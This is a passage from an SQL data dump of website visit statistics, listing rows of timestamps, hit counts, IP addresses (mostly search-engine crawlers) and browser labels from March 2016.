'),(17582,1457543258,1,1,0,0,'217.69.133.84','other'),(17583,1457543320,1,1,0,0,'178.154.149.11','other'),(17584,1457543321,1,1,0,0,'141.8.183.14','other'),(17585,1457543512,1,0,1,0,'66.249.66.158',''),(17586,1457543533,1,0,1,0,'66.249.66.154',''),(17587,1457543547,19,0,19,0,'66.249.66.146',''),(17588,1457543553,1,1,0,0,'87.76.239.232','chrome'),(17589,1457543753,1,1,0,0,'95.221.195.76','msie'),(17590,1457543771,1,1,0,0,'87.206.26.193','firefox'),(17591,1457543883,1,1,0,0,'37.187.95.164','other'),(17592,1457544465,1,1,0,0,'91.124.182.203','firefox'),(17593,1457544832,2,1,1,0,'66.249.66.158',''),(17594,1457544884,1,1,0,0,'217.69.143.45','other'),(17595,1457545005,3,3,0,0,'141.8.184.18','other'),(17596,1457545006,5,5,0,0,'178.154.149.11','other'),(17597,1457545017,1,0,1,0,'68.180.229.232',''),(17598,1457545082,8,1,7,0,'66.249.66.146',''),(17599,1457545125,1,1,0,0,'37.187.94.158','other'),(17600,1457545167,1,1,0,0,'217.69.143.53','other'),(17601,1457545503,1,1,0,0,'217.69.143.70','other'),(17602,1457545504,1,1,0,0,'217.69.143.66','other'),(17603,1457545629,1,0,1,0,'66.249.66.154',''),(17604,1457546126,4,0,4,0,'66.249.66.146',''),(17605,1457546242,1,1,0,0,'217.69.133.234','other'),(17606,1457546263,1,1,0,0,'217.69.133.219','other'),(17607,1457546264,1,1,0,0,'217.69.133.67','other'),(17608,1457546265,1,1,0,0,'217.69.133.215','other'),(17609,1457546266,1,1,0,0,'217.69.133.217','other'),(17610,1457546314,1,1,0,0,'51.255.65.54','other'),(17611,1457546328,1,0,1,0,'66.249.66.158',''),(17612,1457546341,1,1,0,0,'8.29.198.26','other'),(17613,1457546430,1,1,0,0,'91.196.178.133','chrome'),(17614,1457546662,1,1,0,0,'66.249.66.165','other'),(17615,1457546865,1,0,1,0,'66.249.66.154',''),(17616,1457547056,1,1,0,0,'217.69.133.223','other'),(17617,1457547718,2,0,2,0,'68.180.229.232',''),(17618,1457547751,4,4,0,0,'130.193.37.21','other'),(17619,1457547752,3,3,0,0,'5.255.253.53','other'),(17620,1457547753,4,4,0,0,'141.8.132.99','other'),(17621,1457547756,3,3,0,0,'178.154.149.11','other'),(17622,1457547760,1,1,0,0,'141.8.183.14','other'),(17623,1457548025,2,2,0,0,'5.255.253.100','other'),(17624,1457548029,3,3,0,0,'141.8.184.18','other'),(17625,1457548293,1,0,1,0,'66.249.66.154',''),(17626,1457548484,112,112,0,0,'80.91.162.99','other'),(17627,1457548685,1,1,0,0,'180.76.15.13','other'),(17628,1457548844,18,0,18,0,'66.249.66.146',''),(17629,1457548937,1,1,0,0,'51.255.65.55','other'),(17630,1457548971,1,1,0,0,'217.69.133.67','other'),(17631,1457548972,1,1,0,0,'217.69.133.85','other'),(17632,1457549232,1,1,0,0,'51.255.65.10','other'),(17633,1457549511,1,1,0,0,'37.187.95.201','other'),(17634,1457549539,1,0,1,0,'66.249.66.165',''),(17635,1457549646,1,0,1,0,'68.180.229.232',''),(17636,1457549742,1,1,0,0,'51.255.65.36','other'),(17637,1457549776,2,0,2,0,'66.249.66.169',''),(17638,1457549811,1,1,0,0,'77.121.227.203','msie'),(17639,1457550281,3,0,3,0,'66.249.66.154',''),(17640,1457550364,1,0,1,0,'66.249.66.158',''),(17641,1457550695,17,0,17,0,'66.249.66.146',''),(17642,1457550696,1,1,0,0,'180.76.15.149','other'),(17643,1457550906,1,1,0,0,'91.124.182.203','firefox'),(17644,1457551147,1,1,0,0,'217.69.133.223','other'),(17645,1457551174,1,1,0,0,'217.69.143.68','other'),(17646,1457551175,1,1,0,0,'217.69.143.62','other'),(17648,1457551182,3,3,0,0,'141.8.183.14','other'),(17649,1457551183,7,7,0,0,'141.8.184.18','other'),(17650,1457551184,2,2,0,0,'93.158.152.9','other'),(17652,1457551185,2,2,0,0,'5.255.253.53','other'),(17653,1457551188,3,3,0,0,'178.154.149.11','other'),(17654,1457551457,2,0,2,0,'66.249.66.158',''),(17655,1457551510,1,1,0,0,'66.249.92.95','other'),(17656,1457551646,1,1,0,0,'217.69.143.42','other'),(17657,1457551821,1,1,0,0,'217.69.133.85','other'),(17658,1457551865,9,9,0,0,'136.243.172.46','chrome'),(17660,1457552525,9,0,9,0,'66.249.66.146',''),(17661,1457552589,1,0,1,0,'66.249.66.154',''),(17662,1457552788,1,1,0,0,'51.255.65.57','other'),(17663,1457552890,1,1,0,0,'176.119.67.230','other'),(17664,1457552913,1,1,0,0,'51.255.65.17','other'),(17665,1457553109,2,0,2,0,'66.249.66.158',''),(17666,1457553306,1,1,0,0,'5.255.253.53','other'),(17667,1457553307,1,1,0,0,'93.158.152.9','other'),(17668,1457554149,1,1,0,0,'217.69.143.67','other'),(17669,1457554150,1,1,0,0,'217.69.143.69','other'),(17670,1457554407,7,0,7,0,'66.249.66.146',''),(17671,1457554723,1,1,0,0,'217.69.133.85','other'),(17672,1457554725,2,2,0,0,'217.69.133.216','other'),(17673,1457554726,1,1,0,0,'217.69.133.217','other'),(17674,1457555126,1,1,0,0,'94.179.82.219','chrome'),(17675,1457555127,1,0,1,0,'68.180.229.232',''),(17676,1457555608,1,1,0,0,'37.187.94.206','other'),(17677,1457555729,1,1,0,0,'51.255.65.54','other'),(17678,1457555830,2,0,2,0,'66.249.66.154',''),(17679,1457556042,1,1,0,0,'77.121.227.203','chrome'),(17680,1457556110,1,1,0,0,'217.69.143.42','other'),(17681,1457556238,1,1,0,0,'141.8.183.14','other'),(17683,1457556273,26,0,26,0,'66.249.66.146',''),(17684,1457556443,19,19,0,0,'82.193.127.15','other'),(17685,1457556660,1,0,1,0,'66.249.66.162',''),(17686,1457556672,4,0,4,0,'66.249.66.158',''),(17687,1457556709,2,2,0,0,'217.69.133.222','other'),(17688,1457556710,1,1,0,0,'217.69.133.224','other'),(17689,1457556711,2,2,0,0,'217.69.133.225','other'),(17690,1457556889,1,1,0,0,'37.110.107.83','msie'),(17691,1457557112,1,0,1,0,'66.249.66.133',''),(17692,1457557117,5,0,5,0,'68.180.229.232',''),(17693,1457557206,1,1,0,0,'8.29.198.25','other'),(17694,1457557243,1,0,1,0,'66.249.66.166',''),(17695,1457557506,1,1,0,0,'51.255.65.60','other'),(17696,1457557668,1,1,0,0,'217.69.133.85','other'),(17697,1457557765,15,0,15,0,'66.249.66.158',''),(17698,1457557848,1,1,0,0,'51.255.65.59','other'),(17699,1457557878,8,8,0,0,'141.8.184.18','other'),(17700,1457557879,5,5,0,0,'141.8.183.14','other'),(17701,1457557884,5,5,0,0,'178.154.149.11','other'),(17702,1457557907,1,1,0,0,'77.121.227.203','chrome'),(17703,1457558223,1,1,0,0,'217.69.133.224','other'),(17704,1457558224,1,1,0,0,'217.69.133.220','other'),(17705,1457558391,1,0,1,0,'66.249.66.162',''),(17706,1457558649,1,0,1,0,'66.249.66.166',''),(17707,1457559305,1,0,1,0,'66.249.66.162',''),(17708,1457559528,2,0,2,0,'66.249.66.158',''),(17709,1457559796,1,1,0,0,'77.121.227.203','chrome'),(17710,1457559803,1,1,0,0,'207.46.13.43','other'),(17711,1457560087,1,1,0,0,'217.69.143.51','other'),(17712,1457560334,1,1,0,0,'217.69.133.215','other'),(17713,1457560385,1,1,0,0,'37.187.94.128','other'),(17714,1457560464,1,1,0,0,'5.255.253.9','other'),(17715,1457560465,1,1,0,0,'130.193.51.81','other'),(17716,1457560466,1,1,0,0,'141.8.184.22','other'),(17718,1457560467,1,1,0,0,'130.193.51.102','other'),(17719,1457560469,1,1,0,0,'5.255.253.110','other'),(17720,1457560470,1,1,0,0,'5.255.253.30','other'),(17722,1457560471,1,1,0,0,'141.8.132.76','other'),(17723,1457560472,1,1,0,0,'141.8.132.79','other'),(17724,1457560473,1,1,0,0,'130.193.37.27','other'),(17726,1457560474,1,1,0,0,'130.193.51.85','other'),(17727,1457560475,1,1,0,0,'141.8.142.8','other'),(17729,1457560648,1,0,1,0,'66.249.66.162',''),(17730,1457560707,1,0,1,0,'66.249.66.158',''),(17731,1457560815,1,1,0,0,'37.187.95.171','other'),(17732,1457561125,1,0,1,0,'66.249.66.166',''),(17733,1457561196,1,1,0,0,'51.255.65.52','other'),(17734,1457561492,1,1,0,0,'37.187.94.167','other'),(17735,1457561629,1,1,0,0,'5.255.253.100','other'),(17736,1457561660,1,1,0,0,'217.69.143.57','other'),(17737,1457561672,1,1,0,0,'141.8.142.41','other'),(17738,1457561673,2,2,0,0,'178.154.149.11','other'),(17739,1457561701,2,2,0,0,'93.158.152.9','other'),(17740,1457561753,3,3,0,0,'130.193.37.21','other'),(17741,1457561814,1,1,0,0,'130.193.51.43','other'),(17742,1457561824,1,0,1,0,'66.249.66.158',''),(17743,1457561837,2,2,0,0,'93.158.152.26','other'),(17744,1457561844,2,2,0,0,'141.8.142.10','other'),(17745,1457561845,1,1,0,0,'141.8.132.97','other'),(17747,1457561874,2,2,0,0,'5.255.253.55','other'),(17748,1457561877,1,1,0,0,'37.187.94.133','other'),(17749,1457561889,1,1,0,0,'141.8.132.79','other'),(17751,1457561890,2,2,0,0,'141.8.183.14','other'),(17752,1457561951,1,1,0,0,'141.8.132.2','other'),(17753,1457561966,1,1,0,0,'5.255.253.110','other'),(17754,1457561967,1,1,0,0,'5.255.253.62','other'),(17755,1457561968,2,2,0,0,'130.193.51.85','other'),(17756,1457561969,1,1,0,0,'141.8.184.18','other'),(17757,1457561992,1,1,0,0,'130.193.51.45','other'),(17758,1457561993,1,1,0,0,'130.193.51.81','other'),(17759,1457562102,2,0,2,0,'66.249.66.166',''),(17760,1457562233,1,1,0,0,'217.69.133.85','other'),(17761,1457562234,1,1,0,0,'217.69.133.218','other'),(17762,1457562272,1,1,0,0,'217.69.133.226','other'),(17763,1457562273,1,1,0,0,'217.69.133.220','other'),(17764,1457562276,74,74,0,0,'146.52.190.24','other'),(17765,1457562320,1,1,0,0,'66.249.92.103','other'),(17766,1457562421,1,1,0,0,'51.255.65.54','other'),(17767,1457562881,13,13,0,0,'141.8.183.14','other'),(17768,1457562882,14,14,0,0,'178.154.149.11','other'),(17769,1457562883,12,12,0,0,'141.8.184.18','other'),(17770,1457562884,13,13,0,0,'93.158.152.9','other'),(17771,1457562893,6,6,0,0,'130.193.37.21','other'),(17772,1457562895,4,4,0,0,'141.8.132.99','other'),(17773,1457562896,9,9,0,0,'5.255.253.53','other'),(17774,1457563180,78,78,0,0,'146.52.190.24','other'),(17775,1457563360,1,1,0,0,'217.69.133.218','other'),(17776,1457563462,1,0,1,0,'68.180.229.232',''),(17777,1457563495,1,1,0,0,'62.210.215.100','chrome'),(17778,1457563637,1,1,0,0,'37.187.94.217','other'),(17779,1457563724,1,1,0,0,'66.249.93.90','chrome'),(17780,1457563762,1,1,0,0,'217.69.133.68','other'),(17781,1457564085,66,66,0,0,'146.52.190.24','other'),(17782,1457564176,1,1,0,0,'217.69.143.46','other'),(17783,1457564177,1,1,0,0,'217.69.143.49','other'),(17784,1457564969,7,7,0,0,'141.8.184.18','other'),(17785,1457564970,6,6,0,0,'141.8.183.14','other'),(17786,1457564971,6,6,0,0,'93.158.152.9','other'),(17787,1457564974,3,3,0,0,'178.154.149.11','other'),(17788,1457564977,1,1,0,0,'5.255.253.53','other'),(17789,1457564990,15,15,0,0,'146.52.190.24','other'),(17790,1457565034,1,1,0,0,'91.121.169.194','other'),(17791,1457565155,2,0,2,0,'66.249.66.158',''),(17792,1457565724,1,1,0,0,'207.241.229.222','other'),(17793,1457565857,1,0,1,0,'66.249.66.166',''),(17794,1457565892,1,1,0,0,'217.69.133.215','other'),(17795,1457565893,1,1,0,0,'217.69.133.216','other'),(17796,1457566584,1,1,0,0,'5.255.253.55','other'),(17797,1457566585,1,1,0,0,'141.8.132.99','other'),(17798,1457566586,1,1,0,0,'5.255.253.10','other'),(17799,1457566587,1,1,0,0,'5.255.253.9','other'),(17800,1457566588,2,2,0,0,'141.8.132.97','other'),(17802,1457566590,1,1,0,0,'178.154.149.11','other'),(17803,1457566591,1,1,0,0,'5.255.253.53','other'),(17804,1457566592,1,1,0,0,'141.8.184.11','other'),(17805,1457566593,1,1,0,0,'130.193.51.81','other'),(17806,1457566594,1,1,0,0,'141.8.142.41','other'),(17807,1457566825,1,1,0,0,'51.255.65.14','other'),(17808,1457566924,1,1,0,0,'51.255.65.61','other'),(17809,1457567104,1,1,0,0,'217.69.143.60','other'),(17810,1457567208,1,1,0,0,'178.154.189.204','other'),(17811,1457567768,1,1,0,0,'217.69.133.85','other'),(17812,1457567769,1,1,0,0,'217.69.133.84','other'),(17813,1457567775,1,1,0,0,'217.69.133.226','other'),(17814,1457568038,1,1,0,0,'8.29.198.26','other'),(17815,1457568091,1,1,0,0,'217.69.133.250','other'),(17816,1457568389,1,1,0,0,'51.255.65.54','other'),(17817,1457568724,1,1,0,0,'217.69.143.54','other'),(17818,1457569105,2,0,2,0,'68.180.229.232',''),(17819,1457569366,4,4,0,0,'130.193.37.21','other'),(17820,1457569367,1,1,0,0,'5.255.253.10','other'),(17822,1457569368,1,1,0,0,'5.255.253.55','other'),(17823,1457569369,1,1,0,0,'130.193.51.102','other'),(17824,1457569370,3,3,0,0,'130.193.51.45','other'),(17825,1457569371,1,1,0,0,'141.8.142.10','other'),(17826,1457569372,1,1,0,0,'5.255.253.110','other'),(17827,1457569376,1,1,0,0,'141.8.183.14','other'),(17828,1457569379,1,1,0,0,'5.255.253.100','other'),(17829,1457569435,1,1,0,0,'217.69.133.223','other'),(17830,1457569680,3,3,0,0,'31.172.191.135','chrome'),(17831,1457569795,1,1,0,0,'217.69.143.44','other'),(17832,1457569900,1,1,0,0,'37.9.122.201','other'),(17833,1457569954,1,0,1,0,'66.249.66.158',''),(17834,1457570168,1,1,0,0,'51.255.65.40','other'),(17835,1457571145,2,0,2,0,'66.249.66.158',''),(17836,1457571154,1,1,0,0,'5.255.253.53','other'),(17837,1457571158,1,1,0,0,'93.158.152.26','other'),(17838,1457571162,1,1,0,0,'5.255.253.55','other'),(17839,1457571163,3,0,3,0,'66.249.66.162',''),(17840,1457571168,2,2,0,0,'141.8.183.14','other'),(17841,1457571171,3,3,0,0,'141.8.184.11','other'),(17842,1457571175,3,3,0,0,'141.8.132.76','other'),(17843,1457571179,3,3,0,0,'141.8.184.18','other'),(17844,1457571184,2,0,2,0,'66.249.66.190',''),(17845,1457571192,2,2,0,0,'141.8.132.79','other'),(17846,1457571204,2,2,0,0,'141.8.132.99','other'),(17847,1457571208,1,1,0,0,'141.8.132.97','other'),(17848,1457571212,1,1,0,0,'93.158.152.9','other'),(17849,1457571217,1,1,0,0,'5.255.253.9','other'),(17850,1457571221,1,1,0,0,'141.8.142.41','other'),(17851,1457571229,1,1,0,0,'5.255.253.110','other'),(17852,1457571455,1,1,0,0,'178.154.149.11','other'),(17853,1457571621,1,1,0,0,'217.69.133.85','other'),(17854,1457572024,1,1,0,0,'207.46.13.43','other'),(17855,1457572051,3,0,3,0,'66.249.66.133',''),(17856,1457572225,1,1,0,0,'217.69.133.67','other'),(17857,1457572246,9,0,9,0,'66.249.66.158',''),(17858,1457572368,1,0,1,0,'66.249.66.129',''),(17859,1457572403,2,0,2,0,'66.249.66.190',''),(17860,1457572486,2,0,2,0,'66.249.66.166',''),(17861,1457572598,4,0,4,0,'66.249.66.162',''),(17862,1457572750,1,1,0,0,'66.249.92.99','other'),(17863,1457573152,27,0,27,0,'66.249.66.158',''),(17864,1457573744,1,0,1,0,'66.249.66.129',''),(17865,1457573780,2,0,2,0,'66.249.66.166',''),(17866,1457573799,2,0,2,0,'66.249.66.162',''),(17867,1457574012,1,0,1,0,'66.249.66.133',''),(17868,1457574058,3,0,3,0,'66.249.66.190',''),(17869,1457574069,9,0,9,0,'66.249.66.158',''),(17870,1457574094,1,1,0,0,'51.255.65.13','other'),(17871,1457574097,2,2,0,0,'141.8.132.99','other'),(17872,1457574101,2,2,0,0,'5.255.253.110','other'),(17873,1457574105,1,1,0,0,'5.255.253.100','other'),(17874,1457574136,1,1,0,0,'5.255.253.10','other'),(17875,1457574149,1,1,0,0,'5.255.253.30','other'),(17876,1457574372,1,1,0,0,'217.69.143.71','other'),(17877,1457574373,1,1,0,0,'217.69.143.64','other'),(17878,1457574465,1,1,0,0,'217.69.133.215','other'),(17879,1457574952,1,1,0,0,'66.249.66.162','other'),(17880,1457574979,1,1,0,0,'217.69.133.220','other'),(17881,1457575177,2,0,2,0,'66.249.66.158',''),(17882,1457576174,4,4,0,0,'5.255.253.9','other'),(17883,1457576178,2,2,0,0,'130.193.51.85','other'),(17884,1457576182,1,1,0,0,'93.158.152.9','other'),(17885,1457576186,2,2,0,0,'130.193.51.81','other'),(17886,1457576251,1,0,1,0,'66.249.66.166',''),(17887,1457576281,1,1,0,0,'217.69.143.64','other'),(17888,1457576383,1,1,0,0,'5.255.253.79','other'),(17889,1457576388,1,1,0,0,'5.255.253.110','other'),(17890,1457576392,1,1,0,0,'130.193.37.21','other'),(17891,1457576396,2,2,0,0,'141.8.132.76','other'),(17892,1457576400,3,3,0,0,'141.8.184.18','other'),(17893,1457576404,1,1,0,0,'141.8.184.11','other'),(17894,1457576425,2,2,0,0,'141.8.142.41','other'),(17895,1457576429,1,1,0,0,'141.8.183.14','other'),(17896,1457576441,1,1,0,0,'141.8.184.22','other'),(17897,1457576445,1,1,0,0,'141.8.142.88','other'),(17898,1457576453,1,1,0,0,'178.154.149.9','other'),(17899,1457576462,1,1,0,0,'141.8.132.99','other'),(17900,1457576566,2,0,2,0,'68.180.229.232',''),(17901,1457576696,1,1,0,0,'37.187.95.203','other'),(17902,1457576860,1,1,0,0,'217.69.143.61','other'),(17903,1457577036,1,0,1,0,'66.249.66.162',''),(17904,1457577525,2,0,2,0,'66.249.66.166',''),(17905,1457577643,11,11,0,0,'178.154.149.11','other'),(17906,1457577648,4,4,0,0,'141.8.184.18','other'),(17907,1457577762,1,1,0,0,'51.255.65.34','other'),(17908,1457577850,1,1,0,0,'217.69.133.85','other'),(17909,1457577979,1,0,1,0,'68.180.229.232',''),(17910,1457578800,1,1,0,0,'217.69.133.68','other'),(17911,1457578843,1,1,0,0,'217.69.133.85','other'),(17912,1457578844,1,1,0,0,'217.69.133.215','other'),(17913,1457578908,1,1,0,0,'8.29.198.25','other'),(17914,1457578922,1,1,0,0,'178.154.189.203','other'),(17915,1457578925,2,0,2,0,'66.249.66.158',''),(17916,1457579638,1,0,1,0,'66.249.66.162',''),(17917,1457580046,2,2,0,0,'93.158.152.9','other'),(17918,1457580050,2,2,0,0,'5.255.253.9','other'),(17919,1457580054,3,3,0,0,'130.193.37.27','other'),(17920,1457580059,1,1,0,0,'141.8.183.14','other'),(17921,1457580373,1,1,0,0,'217.69.133.68','other'),(17922,1457580666,1,1,0,0,'130.193.51.45','other'),(17923,1457580670,1,1,0,0,'141.8.142.88','other'),(17924,1457580674,1,1,0,0,'178.154.149.9','other'),(17925,1457580678,1,1,0,0,'141.8.132.99','other'),(17926,1457580683,1,1,0,0,'141.8.132.97','other'),(17927,1457580687,1,1,0,0,'51.255.65.51','other'),(17928,1457580691,1,1,0,0,'130.193.51.7','other'),(17929,1457580695,1,1,0,0,'5.255.253.100','other'),(17930,1457580699,1,1,0,0,'141.8.184.22','other'),(17931,1457580703,1,1,0,0,'130.193.51.85','other'),(17932,1457580708,1,1,0,0,'130.193.37.21','other'),(17933,1457580720,1,1,0,0,'141.8.184.18','other'),(17934,1457580724,1,1,0,0,'141.8.184.11','other'),(17935,1457580728,1,1,0,0,'5.255.253.55','other'),(17936,1457580732,1,1,0,0,'93.158.152.81','other'),(17937,1457581135,1,1,0,0,'180.76.15.160','other'),(17938,1457581438,1,1,0,0,'66.249.66.166','other'),(17939,1457581555,1,0,1,0,'68.180.229.232',''),(17940,1457582508,1,1,0,0,'37.187.94.58','other'),(17941,1457582565,1,1,0,0,'178.154.149.11','other'),(17942,1457582569,2,2,0,0,'141.8.183.14','other'),(17943,1457582573,1,1,0,0,'93.158.152.9','other'),(17944,1457582577,1,1,0,0,'141.8.132.99','other'),(17945,1457582581,1,1,0,0,'5.255.253.100','other'),(17946,1457582585,1,1,0,0,'130.193.51.45','other'),(17947,1457582590,1,1,0,0,'130.193.51.43','other'),(17948,1457582593,1,1,0,0,'5.255.253.10','other'),(17949,1457582598,1,1,0,0,'141.8.184.11','other'),(17950,1457582602,1,1,0,0,'5.255.253.9','other'),(17951,1457582606,1,1,0,0,'130.193.51.7','other'),(17952,1457582625,1,1,0,0,'217.69.133.217','other'),(17953,1457582626,1,0,1,0,'66.249.66.166',''),(17954,1457582702,1,1,0,0,'37.187.94.167','other'),(17955,1457583115,1,1,0,0,'217.69.143.70','other'),(17956,1457583181,1,1,0,0,'51.255.65.81','other'),(17957,1457583528,1,1,0,0,'66.249.66.166','other'),(17958,1457583694,1,1,0,0,'213.179.252.44','chrome'),(17959,1457583775,3,0,3,0,'66.249.66.158',''),(17960,1457583780,1,1,0,0,'66.249.92.103','other'),(17961,1457583840,2,2,0,0,'130.193.37.21','other'),(17962,1457583844,1,1,0,0,'5.255.253.55','other'),(17963,1457583852,1,1,0,0,'130.193.37.27','other'),(17964,1457583856,1,1,0,0,'5.255.253.9','other'),(17965,1457583861,1,1,0,0,'130.193.51.7','other'),(17966,1457583865,1,1,0,0,'5.255.253.30','other'),(17967,1457583869,1,1,0,0,'130.193.51.45','other'),(17968,1457583873,1,1,0,0,'5.255.253.51','other'),(17969,1457583880,1,1,0,0,'37.187.94.200','other'),(17970,1457584415,1,1,0,0,'217.69.133.85','other'),(17971,1457584676,1,0,1,0,'68.180.229.232',''),(17972,1457584704,1,1,0,0,'217.69.143.70','other'),(17973,1457585033,5,1,4,0,'66.249.66.162',''),(17974,1457585181,1,0,1,0,'66.249.66.158',''),(17975,1457585449,1,0,1,0,'66.249.66.166',''),(17976,1457585488,1,1,0,0,'217.69.133.217','other'),(17977,1457585691,1,1,0,0,'51.255.65.2','other'),(17978,1457585796,8,8,0,0,'141.8.184.18','other'),(17979,1457585963,1,0,1,0,'68.180.229.232',''),(17980,1457586229,1,1,0,0,'217.69.133.223','other'),(17981,1457586238,1,1,0,0,'37.187.95.149','other'),(17982,1457586772,1,0,1,0,'66.249.66.166',''),(17983,1457586864,1,1,0,0,'207.46.13.171','other'),(17984,1457586966,1,0,1,0,'66.249.66.158',''),(17985,1457587395,2,0,2,0,'68.180.229.232',''),(17986,1457587655,1,1,0,0,'51.255.65.79','other'),(17987,1457587830,22,22,0,0,'141.8.184.18','other'),(17988,1457587838,8,8,0,0,'178.154.149.11','other'),(17989,1457587854,1,1,0,0,'217.69.143.55','other'),(17990,1457588011,1,0,1,0,'66.249.66.162',''),(17991,1457588182,1,1,0,0,'217.69.133.84','other'),(17992,1457588263,1,1,0,0,'51.255.65.26','other'),(17993,1457588321,49,49,0,0,'82.193.127.15','other'),(17994,1457588435,1,1,0,0,'37.140.178.250','firefox'),(17995,1457588436,1,1,0,0,'37.140.178.250','other'),(17996,1457588917,1,1,0,0,'37.187.95.157','other'),(17997,1457588946,1,1,0,0,'178.94.172.82','chrome'),(17998,1457589278,2,0,2,0,'66.249.66.158',''),(17999,1457589452,1,0,1,0,'68.180.229.232',''),(18000,1457589621,1,1,0,0,'37.187.95.22','other'),(18001,1457589632,2,2,0,0,'217.69.133.84','other'),(18002,1457589633,1,1,0,0,'217.69.133.85','other'),(18003,1457589676,1,0,1,0,'66.249.66.129',''),(18004,1457589717,1,1,0,0,'51.255.65.23','other'),(18005,1457589776,1,1,0,0,'8.29.198.25','other'),(18006,1457590213,1,1,0,0,'217.69.133.67','other'),(18007,1457590420,1,0,1,0,'68.180.229.232',''),(18008,1457590424,1,0,1,0,'66.249.66.158',''),(18009,1457590591,1,0,1,0,'66.249.66.190',''),(18010,1457590635,1,1,0,0,'66.249.79.195','other'),(18011,1457590790,5,5,0,0,'80.91.162.99','other'),(18012,1457590943,1,1,0,0,'82.193.127.15','other'),(18013,1457591164,1,0,1,0,'66.249.66.166',''),(18014,1457591241,1,1,0,0,'37.187.94.161','other'),(18015,1457591400,1,0,1,0,'66.249.66.158',''),(18016,1457591534,1,1,0,0,'217.69.133.222','other'),(18017,1457591535,1,1,0,0,'217.69.133.224','other'),(18018,1457591536,1,1,0,0,'217.69.133.223','other'),(18019,1457591599,1,1,0,0,'217.69.133.215','other'),(18020,1457591705,1,1,0,0,'94.179.119.88','firefox'),(18021,1457591862,3,3,0,0,'82.193.127.15','other'),(18022,1457592185,1,1,0,0,'195.34.204.110','chrome'),(18023,1457592348,1,0,1,0,'66.249.66.166',''),(18024,1457592850,3,3,0,0,'151.80.44.115','other'),(18025,1457593071,1,1,0,0,'91.196.178.33','chrome'),(18026,1457593195,2,2,0,0,'82.193.127.15','other'),(18027,1457593197,1,1,0,0,'85.114.202.132','chrome'),(18028,1457593224,1,1,0,0,'91.196.178.67','firefox'),(18029,1457593450,1,1,0,0,'217.69.133.230','other'),(18030,1457593451,1,1,0,0,'217.69.133.69','other'),(18031,1457593499,1,1,0,0,'91.124.13.61','chrome'),(18032,1457593623,1,1,0,0,'157.55.39.128','other'),(18033,1457593645,1,1,0,0,'78.111.185.120','chrome'),(18034,1457593889,2,0,2,0,'66.249.66.162',''),(18035,1457593982,1,1,0,0,'78.111.185.164','firefox'),(18036,1457594083,2,2,0,0,'91.196.178.136','firefox'),(18037,1457594211,1,0,1,0,'68.180.229.232',''),(18038,1457594613,1,1,0,0,'37.54.23.170','chrome'),(18039,1457594778,1,1,0,0,'141.8.142.10','other'),(18040,1457594779,1,1,0,0,'5.255.253.110','other'),(18041,1457594780,1,1,0,0,'130.193.37.27','other'),(18042,1457594781,1,1,0,0,'93.158.152.9','other'),(18043,1457594784,1,1,0,0,'130.193.51.43','other'),(18044,1457594785,1,1,0,0,'5.255.253.62','other'),(18045,1457594904,1,1,0,0,'66.249.92.95','other'),(18046,1457595167,1,0,1,0,'68.180.229.232',''),(18047,1457595181,1,1,0,0,'46.175.70.193','chrome'),(18048,1457595357,1,1,0,0,'157.55.39.128','other'),(18049,1457595468,1,1,0,0,'37.187.94.218','other'),(18050,1457595633,1,1,0,0,'91.196.178.71','firefox'),(18051,1457595710,1,0,1,0,'66.249.66.162',''),(18052,1457595727,5,5,0,0,'80.91.162.99','other'),(18053,1457595768,1,1,0,0,'91.196.178.165','chrome'),(18054,1457595817,1,1,0,0,'94.179.2.155','opera'),(18055,1457595852,1,0,1,0,'66.249.66.129',''),(18056,1457595927,1,1,0,0,'217.69.133.225','other'),(18057,1457595929,1,1,0,0,'217.69.133.223','other'),(18058,1457595942,1,1,0,0,'217.69.143.64','other'),(18059,1457595966,1,1,0,0,'217.69.133.217','other'),(18060,1457595991,1,1,0,0,'51.255.65.96','other'),(18061,1457596036,1,1,0,0,'217.69.143.49','other'),(18062,1457596228,2,2,0,0,'94.179.73.3','chrome'),(18063,1457596331,1,1,0,0,'207.46.13.161','other'),(18064,1457596471,1,1,0,0,'91.196.178.70','chrome'),(18065,1457596872,1,0,1,0,'66.249.66.162',''),(18066,1457596902,1,1,0,0,'217.69.133.69','other'),(18067,1457597182,1,1,0,0,'217.69.133.220','other'),(18068,1457597288,1,0,1,0,'66.249.66.190',''),(18069,1457597354,1,1,0,0,'91.196.178.67','firefox'),(18070,1457597393,1,1,0,0,'217.69.143.49','other'),(18071,1457597595,1,0,1,0,'68.180.229.232',''),(18072,1457597600,1,1,0,0,'207.46.13.161','other'),(18073,1457597633,1,1,0,0,'91.196.178.71','chrome'),(18074,1457597699,1,1,0,0,'91.196.178.164','chrome'),(18075,1457597846,2,2,0,0,'82.193.127.15','other'),(18076,1457597980,2,0,2,0,'66.249.66.162',''),(18077,1457598318,1,1,0,0,'66.249.66.166','other'),(18078,1457598606,1,0,1,0,'66.249.66.133',''),(18079,1457598746,1,1,0,0,'207.46.13.161','other'),(18080,1457598759,1,1,0,0,'37.53.152.178','chrome'),(18081,1457599115,1,1,0,0,'94.179.2.155','opera'),(18082,1457599221,1,1,0,0,'85.114.202.132','chrome'),(18083,1457599269,1,1,0,0,'217.69.133.217','other'),(18085,1457599270,1,1,0,0,'217.69.133.216','other'),(18086,1457599455,1,1,0,0,'46.211.113.245','chrome'),(18087,1457599616,1,0,1,0,'66.249.66.162',''),(18088,1457599756,1,1,0,0,'37.147.82.100','chrome'),(18089,1457599766,1,0,1,0,'66.249.66.158',''),(18090,1457600092,1,1,0,0,'94.179.2.155','opera'),(18091,1457600363,49,49,0,0,'207.46.13.161','other'),(18092,1457600394,61,61,0,0,'207.46.13.171','other'),(18093,1457600417,4,4,0,0,'136.243.5.87','other'),(18094,1457600479,44,44,0,0,'157.55.39.70','other'),(18095,1457600515,1,1,0,0,'217.69.133.219','other'),(18096,1457600523,55,55,0,0,'157.55.39.128','other'),(18097,1457600608,1,1,0,0,'8.29.198.25','other'),(18098,1457600830,3,0,3,0,'66.249.66.158',''),(18099,1457600869,1,0,1,0,'68.180.229.232',''),(18100,1457601032,1,1,0,0,'217.69.133.217','other'),(18101,1457601254,1,1,0,0,'217.69.133.216','other'),(18102,1457601560,1,1,0,0,'91.196.178.130','firefox'),(18103,1457601603,1,1,0,0,'194.44.230.15','chrome'),(18104,1457601616,1,0,1,0,'66.249.66.168',''),(18105,1457601639,1,1,0,0,'217.69.133.225','other'),(18106,1457601671,1,0,1,0,'66.249.66.166',''),(18107,1457601736,1,0,1,0,'66.249.66.178',''),(18108,1457601976,1,1,0,0,'130.193.51.85','other'),(18109,1457601977,1,1,0,0,'141.8.184.11','other'),(18110,1457601978,2,2,0,0,'130.193.51.81','other'),(18111,1457602071,1,1,0,0,'92.113.1.60','chrome'),(18112,1457602144,1,1,0,0,'5.255.253.10',